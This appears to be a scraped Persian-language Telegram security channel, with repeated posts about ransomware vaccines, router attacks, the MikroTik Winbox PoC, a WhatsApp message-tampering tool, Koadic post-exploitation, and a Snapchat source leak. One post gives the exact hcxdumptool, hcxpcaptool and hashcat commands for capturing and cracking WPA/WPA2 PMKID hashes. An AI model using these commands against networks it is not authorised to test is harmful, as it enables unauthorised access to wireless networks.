جلوگیری از اجرای باج افزار Gand Crab در نسخه های کمتر از 4.2.1
https://asec.ahnlab.com/attachment/[email protected]
https://asec.ahnlab.com/1145
با نصب این برنامه، باج افزار فریب خورده و به این نتیجه میرسد که در حال حاضر بر روی سیستم قربانی اجرا شده است.
البته در نسخه های جدیدتر این باج افزار، برنامه مذکور کارایی ندارد!
#ransomware
#windows
#gandcrab
@sec_nerd
https://asec.ahnlab.com/attachment/[email protected]
https://asec.ahnlab.com/1145
با نصب این برنامه، باج افزار فریب خورده و به این نتیجه میرسد که در حال حاضر بر روی سیستم قربانی اجرا شده است.
البته در نسخه های جدیدتر این باج افزار، برنامه مذکور کارایی ندارد!
#ransomware
#windows
#gandcrab
@sec_nerd
در سال ۹۷ برای دومین بار حمله ی زیرساختی به روترهای کشورمون انجام شده ، البته این حملاتی که در اونها هکر میاد و صفحه دیفیس یا کانفیگ با پرچم امریکا رو روی روتر ست میکنه ، صداش میپیچه و میفهمیم که چقدر ما خوابیم!
اینو هم مطمئن باشید هکرهای حرفه ای و سازمان یافته و دولتی (دولتهای خارجی) از این حرکتا نمیکنن و ترجیح میدن که ما از خواب شیرینی که توش هستیم بیدار نشیم.
این دو حمله ای که از اول امسال انجام شده و خبرساز بوده یکی علیه روترهای سیسکو (https://t.iss.one/sec_nerd/2073) و دومی هم علیه میکروتیک بوده.
در مورد اول چند روز بعد از اعلامها و هشدارهای سیسکو در مورد وجود مشکل در روترها و نیاز به بروزرسانی، همه ی مراجع زیربط از جمله مرکز ماهر و ... در تعطیلات عید به سر میبردن و در مورد دوم با وجود هشدار مرکز ماهر، باز هم مدیران شبکه نشون دادن که خواب لذتبخش ترین بخش زندگیشونه!
نکته جالب و مشترک در این دو حمله، رخ دادن اونها در روز جمعه هست!
انگار هکرها هم میدونن مدیران شبکه های ما روزهای جمعه تعطیل ترن! میدونن که جمعه ها برج میلاد کنسرت برگزار میشه و ادمینها تو شلوغی برج میلاد گیر میکنن و خیلی ها میتونن چند دقیقه بیشتر به ریش سکیوریتی بخندن.
یا حتی هکرهای امریکایی فهمیدن که از ۱۳ تا ۱۷ فروردین (روز حمله به روترهای سیسکو) بین التعطیلی حساب میشه و ادمین های ما به حرف پلیس گوش نمیدن و بازگشتشون رو میذارن ساعات آخر!
باید بفهمیم که امنیت، یه آسیاب بادی نیست که راهش بندازیم و بریم بخوابیم و باد بزنه چرخ کسب و کارمون بچرخه.
#bitter
#security
@sec_nerd
اینو هم مطمئن باشید هکرهای حرفه ای و سازمان یافته و دولتی (دولتهای خارجی) از این حرکتا نمیکنن و ترجیح میدن که ما از خواب شیرینی که توش هستیم بیدار نشیم.
این دو حمله ای که از اول امسال انجام شده و خبرساز بوده یکی علیه روترهای سیسکو (https://t.iss.one/sec_nerd/2073) و دومی هم علیه میکروتیک بوده.
در مورد اول چند روز بعد از اعلامها و هشدارهای سیسکو در مورد وجود مشکل در روترها و نیاز به بروزرسانی، همه ی مراجع زیربط از جمله مرکز ماهر و ... در تعطیلات عید به سر میبردن و در مورد دوم با وجود هشدار مرکز ماهر، باز هم مدیران شبکه نشون دادن که خواب لذتبخش ترین بخش زندگیشونه!
نکته جالب و مشترک در این دو حمله، رخ دادن اونها در روز جمعه هست!
انگار هکرها هم میدونن مدیران شبکه های ما روزهای جمعه تعطیل ترن! میدونن که جمعه ها برج میلاد کنسرت برگزار میشه و ادمینها تو شلوغی برج میلاد گیر میکنن و خیلی ها میتونن چند دقیقه بیشتر به ریش سکیوریتی بخندن.
یا حتی هکرهای امریکایی فهمیدن که از ۱۳ تا ۱۷ فروردین (روز حمله به روترهای سیسکو) بین التعطیلی حساب میشه و ادمین های ما به حرف پلیس گوش نمیدن و بازگشتشون رو میذارن ساعات آخر!
باید بفهمیم که امنیت، یه آسیاب بادی نیست که راهش بندازیم و بریم بخوابیم و باد بزنه چرخ کسب و کارمون بچرخه.
#bitter
#security
@sec_nerd
Telegram
امنیت اطلاعات
بنا بر برخی اخبار غیررسمی، به نظر میرسد بخشی از زیرساخت اینترنت کشور دچار مشکل شده است که گمانه زنی های اولیه نشان از حمله به روترهای سیسکوی آسیب پذیر در سرویس دهنده های ارتباط زیر ساخت و شاتل و افرانت دارد.
https://tools.cisco.com/security/center/cont…
https://tools.cisco.com/security/center/cont…
پورت فورواردینگ در ویندوز با استفاده از پاورشل
https://github.com/deepzec/Win-PortFwd
#ps
#windows
#network
@sec_nerd
https://github.com/deepzec/Win-PortFwd
#ps
#windows
#network
@sec_nerd
محققان امنیتی اعلام کردند بیش از ۲۱۰ هزار روتر میکروتیک با بدافزارهای ماینر آلوده شده اند.
این بدافزارها از آسیب پذیری موجود در winbox که در این لینک (https://github.com/BasuCert/WinboxPoC) موجود است برای نصب خود استفاده میکنند.
این آسیب پذیری به هکرها امکان دسترسی به دستگاه بدون نیاز به گذراندن مراحل احراز هویت را میدهد.
https://thehackernews.com/2018/08/mikrotik-router-hacking.html
#mikrotik
#network
#news
#cryptocurrency
#btc
@sec_nerd
این بدافزارها از آسیب پذیری موجود در winbox که در این لینک (https://github.com/BasuCert/WinboxPoC) موجود است برای نصب خود استفاده میکنند.
این آسیب پذیری به هکرها امکان دسترسی به دستگاه بدون نیاز به گذراندن مراحل احراز هویت را میدهد.
https://thehackernews.com/2018/08/mikrotik-router-hacking.html
#mikrotik
#network
#news
#cryptocurrency
#btc
@sec_nerd
GitHub
GitHub - BasuCert/WinboxPoC: Proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847)
Proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847) - BasuCert/WinboxPoC
قیمت خدمات هک و نفوذ در دارک وب بسیار ناچیز است!
این لیست شامل خدماتی مانند خرید نرم افزار با کارتهای دزدی، ساخت کی لاگر، بدافزار، تروجان و نرم افزار هک وایفای و ... است.
در لینک منبع میتوانید لیست قیمتها را بببینید اما برای مثال قیمت ساخت صفحه فیشینگ و کی لاگر نزدیک به ۲ دلار و بدافزار نزدیک به ۵۰ دلار است.
منبع:
https://www.hackread.com/hacking-tools-ready-made-phishing-pages-sold-on-dark-web/
#darknet
#hack
#news
@sec_nerd
این لیست شامل خدماتی مانند خرید نرم افزار با کارتهای دزدی، ساخت کی لاگر، بدافزار، تروجان و نرم افزار هک وایفای و ... است.
در لینک منبع میتوانید لیست قیمتها را بببینید اما برای مثال قیمت ساخت صفحه فیشینگ و کی لاگر نزدیک به ۲ دلار و بدافزار نزدیک به ۵۰ دلار است.
منبع:
https://www.hackread.com/hacking-tools-ready-made-phishing-pages-sold-on-dark-web/
#darknet
#hack
#news
@sec_nerd
Hackread - Latest Cybersecurity, Tech, AI, Crypto & Hacking News
Hacking tools & ready-made phishing pages being sold on dark web for $2
Dark Web selling hacking tools & ready-made phishing pages for as low as $2 - Apple hacking tools double the cost of other drands on Dark Web.
این ابزار با استفاده از خروجی nmap سرویسها را بروت فورس میکند و قابلیت شناسایی پورتهای غیراستاندارد را نیز دارد.
https://github.com/x90skysn3k/brutespray
#nmap
#bruteforce
#medusa
@sec_nerd
https://github.com/x90skysn3k/brutespray
#nmap
#bruteforce
#medusa
@sec_nerd
شخصی سورس snapchat را بصورت عمومی منتشر کرد.
طبق درخواست یکی از مسئولان اسنپ، این سورس از گیت هاب حذف شده است.
https://github.com/github/dmca/commit/7f359b0798e924363ac16910514b1f0e5a9d6fa1
سورس اصلی در لینک زیر منتشر شده بود که در حال حاضر پیام کپی رایت گیت هاب در آن قرار داده شده است:
https://github.com/i5xx/Source-SnapChat/
تنها نتیجه جستجوی فایل مربوطه در گوگل به لینک زیر منتهی میشود:
https://uploadfiles.io/e513h
#snapchat
#news
#github
@sec_nerd
طبق درخواست یکی از مسئولان اسنپ، این سورس از گیت هاب حذف شده است.
https://github.com/github/dmca/commit/7f359b0798e924363ac16910514b1f0e5a9d6fa1
سورس اصلی در لینک زیر منتشر شده بود که در حال حاضر پیام کپی رایت گیت هاب در آن قرار داده شده است:
https://github.com/i5xx/Source-SnapChat/
تنها نتیجه جستجوی فایل مربوطه در گوگل به لینک زیر منتهی میشود:
https://uploadfiles.io/e513h
#snapchat
#news
#github
@sec_nerd
GitHub
Process DMCA request · github/dmca@7f359b0
Repository with text of DMCA takedown notices as received. GitHub does not endorse or adopt any assertion contained in the following notices. Users identified in the notices are presumed innocent until proven guilty. Additional information about our DMCA…
افزونه burp برای رمزگشایی ترافیک whatsapp
https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint
#burpsuite
#whatsapp
@sec_nerd
https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint
#burpsuite
@sec_nerd
هک کردن WPA/WPA2 با استفاده از روش جدید حمله به WiFi
دریافت PMKID از دستگاه هدف با استفاده از ابزار https://github.com/ZerBea/hcxdumptool
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
تبدیل فایل تولید شده به هش با استفاده از https://github.com/ZerBea/hcxtools
$ ./hcxpcaptool -z test.16800 test.pcapng
کرک کردن هش با استفاده از hashcat
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!
این مرحله بستگی به میزان پیچیدگی پسورد دارد
توضیحات بیشتر:
https://securityaffairs.co/wordpress/75170/hacking/hacking-wifi-wpa-wpa2.html
#wifi
#pentest
#network
#wpa2
@sec_nerd
دریافت PMKID از دستگاه هدف با استفاده از ابزار https://github.com/ZerBea/hcxdumptool
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
تبدیل فایل تولید شده به هش با استفاده از https://github.com/ZerBea/hcxtools
$ ./hcxpcaptool -z test.16800 test.pcapng
کرک کردن هش با استفاده از hashcat
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!
این مرحله بستگی به میزان پیچیدگی پسورد دارد
توضیحات بیشتر:
https://securityaffairs.co/wordpress/75170/hacking/hacking-wifi-wpa-wpa2.html
#wifi
#pentest
#network
#wpa2
@sec_nerd
GitHub
GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices.
Small tool to capture packets from wlan devices. Contribute to ZerBea/hcxdumptool development by creating an account on GitHub.
امنیت اطلاعات
افزونه burp برای رمزگشایی ترافیک whatsapp https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint #burpsuite #whatsapp @sec_nerd
در واتس اپ آسیب پذیریهایی کشف شده است که به کاربر اجازه میدهد که هر پیامی را در گفتگوهای خصوصی و عمومی تغییر دهد.
این مشکل به کاربر اجازه میدهد تا اخبار نادرست را در جایی که منبع قابل اعتمادی است منتشر کند.
این کار بوسیله افزونه معرفی شده در پست فوق قابل انجام است و در ویدیوی زیر میتوانید نحوه انجام آن را ببینید.
https://www.youtube.com/watch?v=rtSFaHPA0C4
منبع:
https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/
#whatsapp
#privacy
#burpsuite
@sec_nerd
این مشکل به کاربر اجازه میدهد تا اخبار نادرست را در جایی که منبع قابل اعتمادی است منتشر کند.
این کار بوسیله افزونه معرفی شده در پست فوق قابل انجام است و در ویدیوی زیر میتوانید نحوه انجام آن را ببینید.
https://www.youtube.com/watch?v=rtSFaHPA0C4
منبع:
https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/
#privacy
#burpsuite
@sec_nerd
YouTube
FakesApp: A Vulnerability in WhatsApp
Check Point Research shows new vulnerabilities in the popular messaging application that could allow threat actors to intercept and manipulate messages sent in both private and group conversations, giving attackers immense power to create and spread misinformation…
استفاده از فایلهای باینری در ویندوز که کاربردهای دوگانه دارند و بهره گیری از آنها در عملیات Post Exploitation (شاید عبارت پسانفوذ معادل یک کلمه ای خوبی برای این مورد باشه) به همراه فریمورک Koadic برای بالابردن سطح دسترسی در ویندوز و نفوذ به سایر سیستم های موجود در شبکه
https://blog.varonis.com/koadic-lol-malware-meets-python-based-command-and-control-c2-server-part-i/
#windows
#network
#privesc
#pivoting
#koadic
#mshta
#lolbin
@sec_nerd
https://blog.varonis.com/koadic-lol-malware-meets-python-based-command-and-control-c2-server-part-i/
#windows
#network
#privesc
#pivoting
#koadic
#mshta
#lolbin
@sec_nerd
Varonis
Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
In my epic series on Windows binaries that have dual uses– talkin’ to you rundll32 and mshta — I showed how hackers can stealthy download and launch remote script-based malware....
امنیت اطلاعات
هک کردن WPA/WPA2 با استفاده از روش جدید حمله به WiFi دریافت PMKID از دستگاه هدف با استفاده از ابزار https://github.com/ZerBea/hcxdumptool $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status تبدیل فایل تولید شده به هش با استفاده از https://g…